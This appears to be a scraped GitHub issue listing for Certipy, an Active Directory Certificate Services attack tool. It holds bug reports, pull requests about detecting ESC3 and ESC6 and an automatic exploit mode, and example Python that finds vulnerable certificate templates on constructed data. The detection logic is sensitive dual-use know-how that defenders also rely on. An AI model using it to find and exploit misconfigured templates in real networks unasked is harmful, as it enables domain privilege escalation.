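    candidates.append(root_dse.get("defaultNamingContext"))

    errors = []
    for base in candidates:
        if not base:
            continue
        try:
            probe(base)          # in practice: a base-scoped LDAP search
            return base
        except Exception as exc:  # the LDAP library's own error type in real code
            errors.append(f"{base}: {exc}")
    raise NamingContextError("; ".join(errors) or "rootDSE exposed no naming context")


def pki_container(root_dse):
    """Templates and enrollment services live in the Configuration NC,
    which is forest-wide and replicated to every DC, child domains included."""
    return "CN=Public Key Services,CN=Services," + root_dse["configurationNamingContext"]


# Constructed rootDSE for a child domain; not real data.
CHILD_ROOT_DSE = {
    "rootDomainNamingContext": "DC=contoso,DC=com",
    "defaultNamingContext": "DC=child,DC=contoso,DC=com",
    "configurationNamingContext": "CN=Configuration,DC=contoso,DC=com",
}


def unreachable_root(base):
    """Simulated search that fails only for the root domain."""
    if base == "DC=contoso,DC=com":
        raise RuntimeError("Could not find domain " + base)
    return True


if __name__ == "__main__":
    print(pick_naming_context(CHILD_ROOT_DSE, unreachable_root))
    print(pki_container(CHILD_ROOT_DSE))
```

The PR also suggests an option to set the base explicitly; in this shape that is just calling `probe` on a user-supplied DN before `pick_naming_context`.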
  • LDAP.py fails with SSL error

    LDAP.py fails with SSL error

    With Python 3.7, 3.8 and 3.9, Certipy fails with SSL errors originating from ldap.py.

    This seems to be similar to this issue with Impacket. Is there a quick fix?

    [email protected]:/home/user# certipy domain.org/[email protected] find
    Password:
    Traceback (most recent call last):
      File "/usr/local/bin/certipy", line 11, in <module>
        load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')()
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 170, in main
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 846, in find
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 506, in run
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 495, in connect
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/ldap.py", line 72, in connect
      File "/usr/local/lib/python3.9/dist-packages/impacket/ldap/ldap.py", line 122, in __init__
        self._socket.do_handshake()
      File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
        self._raise_ssl_error(self._ssl, result)
      File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
        _raise_current_error()
      File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
        raise exception_type(errors)
    OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
    opened by ssabetan 1
  • Implement esc3 as separate issue

    Implement esc3 as separate issue

    Hi,

    I created a new pull request and cleaned merge history to avoid conflicts and provide clean diffs.

    You wrote in the last pull request:

    Thank you for your PR. First of all, there are some merge conflicts that need to be resolved; I apologize if the mistake happened on my end. Secondly, this PR will give a false positive for the "auto" feature as the certificate is marked as vulnerable without the method being implemented to exploit. It will fail and continue with other certificate templates, but perhaps there is a better way to inform the user that the certificate might be vulnerable without automatically trying to exploit it in the "auto" feature.

    The exact same issue should already happen before:

    [image] As you can see here, certificates with "Certificate Request Agent" eku were already reported before. I just moved this detection outside of has_dangerous_eku to have a better distinction as they are quite different to exploit.

    The autoexploit function also fails for vulnerable_acl or owner_sid (ESC4) type vulnerabilities.

    I would therefore suggest to merge this merge request, as there is no impact for "auto" (same issue was there before) and it now allows reliable filtering on different vulnerability types.

    So one could add a new check here: [image] and filter certificate_template._vulnerable_technique_ids for implemented types.

    opened by offensity 1
  • Implement ESC6 in certificate templates is vulnerable

    Implement ESC6 in certificate templates is vulnerable

    ESC6 is currently only discovered in auto, added it to find -vulnerable as well.

    Function is now implemented in certificate template

    opened by offensity 1
  • Implement esc3 as separate issue

    Implement esc3 as separate issue

    ESC3 is currently reported together with ESC2, but they are quite different, so I split them up

    Please be aware that add technique ids from paper to output #6 should be merged first, as this commit depends on it

    opened by offensity 1
  • ModuleNotFoundError: No module named 'impacket.examples.utils'

    ModuleNotFoundError: No module named 'impacket.examples.utils'

    I get this error message when I run certipy.

    ModuleNotFoundError: No module named 'impacket.examples.utils'

    New kali (2022.1), new impacket (0.9.24-1)

    opened by hawaii67 1
  • Fix error when no certificate templates are configured

    Fix error when no certificate templates are configured

    Hey,

    There is an error in the find module when no templates are configured on a CA. As such, the certificateTemplates attribute does not exist and it breaks the parsing. Here is the stacktrace:

    [image]

    I added a quick workaround, tell me if it's okay with you.

    opened by Clayno 1
  • add json output flag to find command

    add json output flag to find command

    Add a new json output to find command

    opened by offensity 1
  • Add esc6 to find

    Add esc6 to find

    opened by offensity 1
  • add technique ids from paper to output

    add technique ids from paper to output

    To ease reference to the paper Certified_Pre-Owned, add the corresponding classes to the output.

    [image]

    opened by offensity 1
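An added example, not Certipy's own code, that ties together the PRs above: it tags published certificate templates with the Certified Pre-Owned technique IDs (ESC1, ESC2, ESC3 reported separately from ESC2, ESC4, ESC6 from the CA's EditFlags) and tolerates a CA object whose certificateTemplates attribute is missing. Inputs are constructed dictionaries shaped after the LDAP attributes; the keys `enroll_sids`, `write_sids` and `owner_sid` are this example's simplification of the parsed template security descriptor, and `ca_edit_flags` stands for the EditFlags value of the CA policy module. The checks are deliberately simplified relative to the full conditions in the paper.

```python
# Extended key usage OIDs
OID_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
OID_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
OID_SMART_CARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
OID_ANY_PURPOSE = "2.5.29.37.0"
OID_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
AUTH_EKUS = {OID_CLIENT_AUTH, OID_PKINIT_CLIENT_AUTH, OID_SMART_CARD_LOGON, OID_ANY_PURPOSE}

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000      # CA policy module EditFlags (ESC6)
AUTHENTICATED_USERS = "S-1-5-11"


def classify_template(tpl, ca_edit_flags=0, low_priv_sids=frozenset({AUTHENTICATED_USERS})):
    """Return the set of ESC IDs that apply to one template (simplified checks)."""
    ekus = set(tpl.get("pKIExtendedKeyUsage", []))
    name_flags = tpl.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flags = tpl.get("msPKI-Enrollment-Flag", 0)
    signatures_required = tpl.get("msPKI-RA-Signature", 0)
    low_priv = set(low_priv_sids)

    # A low-privileged principal can obtain a certificate with nobody else in the loop.
    requestable = (
        bool(set(tpl.get("enroll_sids", [])) & low_priv)
        and not enroll_flags & CT_FLAG_PEND_ALL_REQUESTS
        and signatures_required == 0
    )
    usable_for_logon = bool(ekus & AUTH_EKUS)

    findings = set()
    if requestable and usable_for_logon and name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        findings.add("ESC1")   # requester chooses the subject/SAN of a logon certificate
    if requestable and (not ekus or OID_ANY_PURPOSE in ekus):
        findings.add("ESC2")   # Any Purpose EKU, or no EKU at all
    if requestable and OID_CERT_REQUEST_AGENT in ekus:
        findings.add("ESC3")   # enrollment agent template, reported on its own, not as ESC2
    if tpl.get("owner_sid") in low_priv or set(tpl.get("write_sids", [])) & low_priv:
        findings.add("ESC4")   # low-privileged owner or write access to the template object
    if requestable and usable_for_logon and ca_edit_flags & EDITF_ATTRIBUTESUBJECTALTNAME2:
        findings.add("ESC6")   # CA honours a caller-supplied SAN on any template
    return findings


def find_vulnerable(ca, templates, ca_edit_flags=0, low_priv_sids=frozenset({AUTHENTICATED_USERS})):
    """Map template name -> sorted ESC IDs, for templates published on `ca` only.

    A pKIEnrollmentService object has no certificateTemplates attribute when the
    CA publishes nothing, so the attribute is read with a default, not indexed.
    """
    published = set(ca.get("certificateTemplates", []))
    result = {}
    for tpl in templates:
        if tpl["name"] not in published:
            continue
        ids = classify_template(tpl, ca_edit_flags, low_priv_sids)
        if ids:
            result[tpl["name"]] = sorted(ids)
    return result


# Constructed sample data; not taken from any real forest.
TEMPLATES = [
    {"name": "VulnUser", "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "enroll_sids": [AUTHENTICATED_USERS], "owner_sid": "S-1-5-32-544"},
    {"name": "Agent", "pKIExtendedKeyUsage": [OID_CERT_REQUEST_AGENT],
     "enroll_sids": [AUTHENTICATED_USERS], "owner_sid": "S-1-5-32-544"},
    {"name": "AnyPurpose", "pKIExtendedKeyUsage": [OID_ANY_PURPOSE],
     "enroll_sids": [AUTHENTICATED_USERS], "owner_sid": "S-1-5-32-544"},
    {"name": "User", "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
     "enroll_sids": [AUTHENTICATED_USERS], "owner_sid": "S-1-5-32-544"},
    {"name": "Unpublished", "pKIExtendedKeyUsage": [OID_CLIENT_AUTH],
     "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "enroll_sids": [AUTHENTICATED_USERS], "owner_sid": AUTHENTICATED_USERS},
]
CA = {"name": "corp-CA", "certificateTemplates": ["VulnUser", "Agent", "AnyPurpose", "User"]}
EMPTY_CA = {"name": "empty-CA"}   # no certificateTemplates attribute at all

if __name__ == "__main__":
    print(find_vulnerable(CA, TEMPLATES, EDITF_ATTRIBUTESUBJECTALTNAME2))
    print(find_vulnerable(EMPTY_CA, TEMPLATES))
```

Keeping ESC3 out of the ESC2 set is what makes the `auto` question above answerable: a consumer can filter the returned IDs to the techniques it actually knows how to exploit and merely report the rest.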
  • Dumping the AD for import into Bloodhound fails using low priv. accounts in 2.0.4

    Dumping the AD for import into Bloodhound fails using low priv. accounts in 2.0.4

    I can successfully dump my AD for import into Bloodhound using 2.0.1 and a low priv. account. [image: dump_working]

    When I try this in 2.0.4 using the same low priv. account as above and the same AD this partially fails. [image: dump_failing]

    When I use the account domainadmin1 (high priv.) dumping works in 2.0.4. [image: dump_working2]

    Is all of this intentional? If not, something seems to have broken.

    opened by jsdhasfedssad 2
Releases(2.0.6)
Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn